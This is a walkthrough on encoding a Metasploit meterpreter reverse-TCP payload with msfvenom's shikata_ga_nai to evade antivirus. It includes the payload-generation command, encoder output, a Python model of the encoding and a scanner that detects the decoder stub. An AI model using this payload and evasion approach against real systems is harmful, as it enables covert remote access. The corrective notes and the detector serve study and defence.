

Msfvenom Encoding for AV Evasion: A Practical Walkthrough

Published: 2024/3/12


AV evasion is highly practical in real-world penetration testing. This article shows how to use the encoders that ship with msfvenom to encode a payload so that it gets past antivirus software and still returns a shell.
A trojan payload built as described here is claimed to bypass most of the antivirus products used in China, including but not limited to Huorong, Tencent, Baidu and Kingsoft, with a VirusTotal sandbox detection figure of 12 (as reported in the original post); simple but practical. One caveat a practitioner should keep in mind: Metasploit encoders were designed to keep bad characters (NUL bytes, newlines) out of exploit buffers, not to defeat AV. Encoding is not encryption, the key is embedded in the decoder stub in front of the data, and the shikata_ga_nai stub is one of the most heavily signatured byte patterns in existence, so detection results vary by engine and by date and should always be re-measured rather than assumed.

First, list the encoders msfvenom provides (msfvenom is a standalone command-line tool, run from the shell rather than from the msfconsole prompt):

$ msfvenom --list encoders

Output:

Framework Encoders [--encoder <value>]
======================================

    Name                          Rank       Description
    ----                          ----       -----------
    cmd/brace                     low        Bash Brace Expansion Command Encoder
    cmd/echo                      good       Echo Command Encoder
    cmd/generic_sh                manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Bourne ${IFS} Substitution Command Encoder
    cmd/perl                      normal     Perl Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The "none" Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    ruby/base64                   great      Ruby Base64 Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x64/xor_context               normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic               normal     Dynamic key XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/bmp_polyglot              manual     BMP Polyglot
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time              manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder (optimised)
    x86/service                   manual     Register Service
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic               normal     Dynamic key XOR Encoder

The list shows every available encoder. The example below uses x86/shikata_ga_nai (rank: excellent), which matches the 32-bit x86 Windows payload being generated.
For reference, these are msfvenom's command-line options:

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message

Now generate the payload. The command is run from the shell; `-f raw` writes the bare encoded shellcode bytes to the file, and `-i 16` asks for sixteen nested encoding passes:

$ msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 16 LHOST=192.168.0.103 LPORT=4444 -f raw > /Users/shikapy.py

Output:

Found 1 compatible encoders
Attempting to encode payload with 16 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai succeeded with size 408 (iteration=1)
x86/shikata_ga_nai succeeded with size 435 (iteration=2)
x86/shikata_ga_nai succeeded with size 462 (iteration=3)
x86/shikata_ga_nai succeeded with size 489 (iteration=4)
x86/shikata_ga_nai succeeded with size 516 (iteration=5)
x86/shikata_ga_nai succeeded with size 543 (iteration=6)
x86/shikata_ga_nai succeeded with size 570 (iteration=7)
x86/shikata_ga_nai succeeded with size 597 (iteration=8)
x86/shikata_ga_nai succeeded with size 624 (iteration=9)
x86/shikata_ga_nai succeeded with size 651 (iteration=10)
x86/shikata_ga_nai succeeded with size 678 (iteration=11)
x86/shikata_ga_nai succeeded with size 705 (iteration=12)
x86/shikata_ga_nai succeeded with size 732 (iteration=13)
x86/shikata_ga_nai succeeded with size 759 (iteration=14)
x86/shikata_ga_nai succeeded with size 786 (iteration=15)
x86/shikata_ga_nai chosen with final size 786
Payload size: 786 bytes
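What one shikata_ga_nai iteration actually does to the bytes is easier to see in code. The block below is an added illustration, not Metasploit's implementation: the real encoder emits a polymorphic x86 decoder stub (an FPU instruction, `mov reg, key`, `fnstenv [esp-0xC]` plus `pop` as GetPC, then a loop of `xor`/`add`) in front of the encoded data, whereas this model replaces the stub with a placeholder header carrying the key and the block count (`STUB_MAGIC`, `HEADER_LEN` and every other name here are the example's own). The transform itself is the point: XOR with a running 32-bit key that is advanced by each decoded dword (additive feedback), and each iteration wraps the whole previous output, previous stub included, so only the outermost stub is ever in the clear and the size grows by a fixed stub overhead per pass, which is the +27 bytes per iteration visible in the output above. The sample "stager" is constructed, sized at 354 bytes to match what the output implies (381 bytes after iteration 0 minus the 27-byte stub).

```python
import os
import struct

# Placeholder for the x86 decoder instructions (assumption of this model; the
# real stub is 27 bytes of polymorphic code, here a 12-byte header).
STUB_MAGIC = b"STUB"
HEADER_LEN = len(STUB_MAGIC) + 8            # magic + 32-bit key + 32-bit block count

# Constructed sample payload: 354 bytes, the unencoded size implied by the
# msfvenom output above. Not a real stager.
SAMPLE_PAYLOAD = bytes(range(256)) + b"\xcc" * 98


def _feedback_xor(blocks, key, encode):
    """XOR additive-feedback transform over 32-bit little-endian blocks.
    Each block is XORed with the running key, then the key is advanced by the
    PLAINTEXT block. The decoder can follow because its xor recovers the
    plaintext just before its add consumes it."""
    out = []
    for blk in blocks:
        plain = blk if encode else blk ^ key
        out.append(plain ^ key if encode else plain)
        key = (key + plain) & 0xFFFFFFFF
    return out


def encode_once(payload, key=None):
    """One encoder pass: header (key, block count) + encoded, dword-padded data.
    The real stub keeps its overhead constant by folding its own last 1-4 bytes
    into the encoded region; this model simply NOP-pads to a dword boundary."""
    if key is None:
        key = struct.unpack("<I", os.urandom(4))[0]      # random key per pass, as in the real encoder
    padded = payload + b"\x90" * (-len(payload) % 4)
    nblocks = len(padded) // 4
    blocks = struct.unpack("<%dI" % nblocks, padded)
    enc = _feedback_xor(blocks, key, encode=True)
    return STUB_MAGIC + struct.pack("<II", key, nblocks) + struct.pack("<%dI" % nblocks, *enc)


def decode_once(blob):
    """Undo one pass using only what the stub carries: the key and the count.
    Nothing secret is needed, which is why encoding is not encryption."""
    if not blob.startswith(STUB_MAGIC):
        raise ValueError("no decoder stub at offset 0")
    key, nblocks = struct.unpack_from("<II", blob, len(STUB_MAGIC))
    body = blob[HEADER_LEN:HEADER_LEN + 4 * nblocks]
    blocks = struct.unpack("<%dI" % nblocks, body)
    return struct.pack("<%dI" % nblocks, *_feedback_xor(blocks, key, encode=False))


def encode_iterations(payload, iterations):
    """msfvenom -i N: pass k encodes the entire output of pass k-1, its stub
    included, so only the outermost stub remains in the clear."""
    blob = payload
    for _ in range(iterations):
        blob = encode_once(blob)
    return blob


def decode_iterations(blob, iterations, original_len):
    """Peel the layers off from the outside in; trailing padding is dropped."""
    for _ in range(iterations):
        blob = decode_once(blob)
    return blob[:original_len]


def changed_blocks(payload, key, flip_offset):
    """Demonstrate the feedback: flipping one plaintext byte changes that dword
    and every ciphertext dword after it, because the running key diverges."""
    a = encode_once(payload, key)[HEADER_LEN:]
    tweaked = bytearray(payload)
    tweaked[flip_offset] ^= 0x01
    b = encode_once(bytes(tweaked), key)[HEADER_LEN:]
    return [i for i in range(len(a) // 4) if a[4 * i:4 * i + 4] != b[4 * i:4 * i + 4]]


if __name__ == "__main__":
    blob = SAMPLE_PAYLOAD
    for i in range(16):
        blob = encode_once(blob)
        print("model: succeeded with size %d (iteration=%d)" % (len(blob), i))
    assert decode_iterations(blob, 16, len(SAMPLE_PAYLOAD)) == SAMPLE_PAYLOAD
    print("changed blocks after flipping byte 200:", changed_blocks(SAMPLE_PAYLOAD, 0xDEADBEEF, 200))
```

Running the model prints the same arithmetic shape as the msfvenom output (a constant increment per iteration, 12 bytes here instead of 27), and `changed_blocks` shows that a one-bit change at byte 200 alters dword 50 and every dword after it. That avalanche is what makes the output look different on every run; it does nothing about the stub at offset 0, which is what signatures target.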

The trojan payload has now been written to /Users/shikapy.py. Note that `-f raw` emits the bare encoded shellcode, so despite the `.py` extension the file is not Python source; `-f python` would instead produce a `buf` variable that a Python loader script can embed.

Evasion can be pushed further by injecting the payload into a custom executable template (`-x <path>`, with `-k` to keep the template's original behaviour) or by wrapping it in a Python loader and converting that to an exe with py2exe; neither is covered here.
Attached: VirusTotal scan result (screenshot).
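Before trusting a VirusTotal screenshot, it is worth checking what the encoder leaves in the clear. The scanner below is an added example, not part of the original post: it looks for the `fnstenv [esp-0xC]` GetPC sequence (bytes `D9 74 24 F4`) followed within a few bytes by a `pop` into a general register, the long-published signature of the shikata_ga_nai decoder stub, and strengthens the verdict when an FPU opcode (D8..DF) precedes it, as the stub's prologue does. Because only the outermost stub of an `-i 16` payload is unencoded, exactly this pattern survives every iteration count. The two sample blobs are constructed for the demo (a hand-assembled prologue in the stub's shape and a clean byte run), not real msfvenom output; pass a file path to scan a real one.

```python
import sys

# fnstenv [esp-0xC]: the GetPC idiom the shikata_ga_nai stub uses to locate
# itself. The saved FPU environment leaves the address of the last FPU
# instruction at [esp-0xC], which the following pop lifts into a register.
FNSTENV_ESP = bytes.fromhex("d97424f4")
POP_REG = {0x58 + r for r in range(8)}            # pop eax .. pop edi

# Constructed for this demo, NOT real msfvenom output: a hand-assembled prologue
# in the shape the stub takes (fcmovnbe st0,st2 ; mov eax,imm32 ;
# fnstenv [esp-0xC] ; pop esi ; sub ecx,ecx ; mov cl,0x5f) plus filler bytes.
SYNTHETIC_STUB = bytes.fromhex("dad2" "b878563412" "d97424f4" "5e" "29c9" "b15f") + bytes(range(32))
CLEAN_BLOB = bytes(range(256))


def find_getpc_stubs(blob, window=6):
    """Return (fnstenv_offset, pop_offset) for every fnstenv [esp-0xC] that is
    followed within `window` bytes by a pop into a general register. The window
    leaves room for a 5-byte `mov reg, imm32` (the key) between the two."""
    hits = []
    start = 0
    while True:
        i = blob.find(FNSTENV_ESP, start)
        if i < 0:
            return hits
        for j, b in enumerate(blob[i + 4:i + 4 + window]):
            if b in POP_REG:
                hits.append((i, i + 4 + j))
                break
        start = i + 1


def preceded_by_fpu(blob, offset, lookback=12):
    """The stub runs an FPU instruction (opcode D8..DF) before fnstenv so the
    saved environment holds a useful address; look for one just before."""
    return any(0xD8 <= b <= 0xDF for b in blob[max(0, offset - lookback):offset])


def verdict(blob):
    """Human-readable summary for one blob."""
    hits = find_getpc_stubs(blob)
    strong = [h for h in hits if preceded_by_fpu(blob, h[0])]
    if strong:
        return "shikata_ga_nai-style GetPC stub at offset %d" % strong[0][0]
    if hits:
        return "fnstenv/pop GetPC at offset %d (no FPU setup seen)" % hits[0][0]
    return "no fnstenv GetPC stub found"


if __name__ == "__main__":
    if len(sys.argv) > 1:                         # e.g. python3 scan.py /Users/shikapy.py
        with open(sys.argv[1], "rb") as f:
            print(sys.argv[1], "->", verdict(f.read()))
    else:
        print("synthetic stub ->", verdict(SYNTHETIC_STUB))
        print("clean blob     ->", verdict(CLEAN_BLOB))
```

If the scan reports a stub at offset 0 on the file generated above, the sixteen iterations have changed nothing about what a static signature sees; the encoded body behind it is noise, but the decoder that reveals it is not. That is the measurement to make before relying on any AV screenshot.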
